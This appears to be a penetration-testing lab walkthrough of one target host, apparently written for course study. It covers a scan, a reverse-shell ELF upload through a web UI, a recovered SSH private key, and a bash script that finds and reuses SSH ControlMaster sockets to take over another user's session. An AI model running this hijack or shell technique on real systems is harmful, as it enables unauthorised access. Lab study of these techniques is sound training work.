Command: nmap -A -Pn 192.168.243.172

Nmap initial output

Nmap scan report for 192.168.243.172
Host is up (0.21s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5f:05:52:08:c6:45:b7:3b:9b:ae:f4:da:12:e0:2f:10 (RSA)
|   256 dd:e2:b9:d3:92:3e:ac:12:e2:a7:fd:36:75:d8:60:88 (ECDSA)
|_  256 b0:0a:6f:c0:e8:71:8b:9a:91:c0:fc:7d:67:48:69:a5 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
Aggressive OS guesses: Linux 4.15 - 5.6 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   205.19 ms 192.168.49.1
2   205.17 ms 192.168.243.172

Using the account credentials obtained from 192.168.243.171, log in to **http://192.168.243.173:8082/ui/login/**

07.png

After logging in, there is a spot that looks like it accepts uploaded ELF files:

08.png

It already contains a tpsreports.elf. Uploading the rev.elf generated in step one produced no reaction; renaming it to tpsreports.elf and uploading it again, then waiting a while, yielded a reverse shell:

10.png

This gives the second flag: 58736c6c295a9197ece6762369769108

Listing the nottodd home directory with ls -alh reveals a .bash_history file, which contains some interesting entries:

11.png

Save the contents of the id_rsa private key that was recovered:

12.png

Key-based login from Kali with this key fails.

Look at the config file under .ssh; compare the textbook, p. 535, "SSH Hijacking with ControlMaster".

13.png

Check the cron jobs: nottodd@cb2:/home/nottodd/.ssh$ crontab -l

14.png

Every five minutes, check whether a new file has appeared in /home/nottodd/.ssh/controlmaster:
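The ControlMaster hijack described in the last few steps works because the user's ssh_config multiplexes sessions over a Unix socket under ControlPath, and any process running as that user can join an open socket with `ssh -S` without supplying a key or password. The script below, added here as an illustration and not taken from the writeup or its course material, reads the ControlMaster settings out of an ssh_config, polls the socket directory for live sockets on the same five-minute cadence, and prints the reuse command. The sample config it prints is constructed for the example; the real one on the target is whatever `.ssh/config` contains, and the socket directory path is an assumption taken from the writeup's crontab step.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): hunting for reusable SSH
# ControlMaster sockets as the compromised user and reusing one with ssh -S.
set -u

# A constructed ssh_config in the shape the technique needs: every session
# to any host becomes a master, its socket lives under ~/.ssh/controlmaster,
# and ControlPersist keeps the master alive after the user's own ssh exits.
sample_config() {
    cat <<'EOF'
Host *
    ControlMaster auto
    ControlPath ~/.ssh/controlmaster/%r@%h:%p
    ControlPersist 10m
EOF
}

# Print the ControlMaster/ControlPath/ControlPersist settings from an ssh_config,
# one "Key Value" pair per line (keys are case-insensitive in ssh_config).
control_settings() {
    awk 'tolower($1) ~ /^(controlmaster|controlpath|controlpersist)$/ { print $1, $2 }' "$1"
}

# List Unix sockets (and only sockets; a stray regular file is not a session)
# directly inside the ControlPath directory. Each one is a multiplexed master
# session that can be joined without authenticating again.
find_control_sockets() {
    find "$1" -maxdepth 1 -type s 2>/dev/null
}

# Join an existing master. With -S the socket decides where the session goes;
# ssh still requires a host argument, so pass the one encoded in the socket name.
use_socket() {
    local sock="$1" host="$2"
    ssh -S "$sock" -O check "$host" 2>/dev/null && ssh -S "$sock" "$host"
}

# Poll the socket directory every five minutes (the same interval as the
# writeup's cron check) and announce any socket that shows up.
watch_sockets() {
    local dir="$1"
    while :; do
        for sock in $(find_control_sockets "$dir"); do
            # Socket names follow the ControlPath pattern, e.g. user@host:port.
            host="${sock##*/}"; host="${host%%:*}"
            printf 'live master socket: %s -> ssh -S %s %s\n' "$sock" "$sock" "$host"
        done
        sleep 300
    done
}

# Run the watcher only when asked, so sourcing the file for its functions is safe.
if [ "${1:-}" = "--watch" ]; then
    watch_sockets "${2:-$HOME/.ssh/controlmaster}"
fi
```

Run it as `bash hijack.sh --watch /home/nottodd/.ssh/controlmaster` from the reverse shell; when the cron-driven ssh session creates a socket, `use_socket` on that path gives a shell on the far end as nottodd. Because ControlPersist keeps the master alive for its timeout after the original session ends, the socket is usable for a window, which is why polling rather than a one-off check matters.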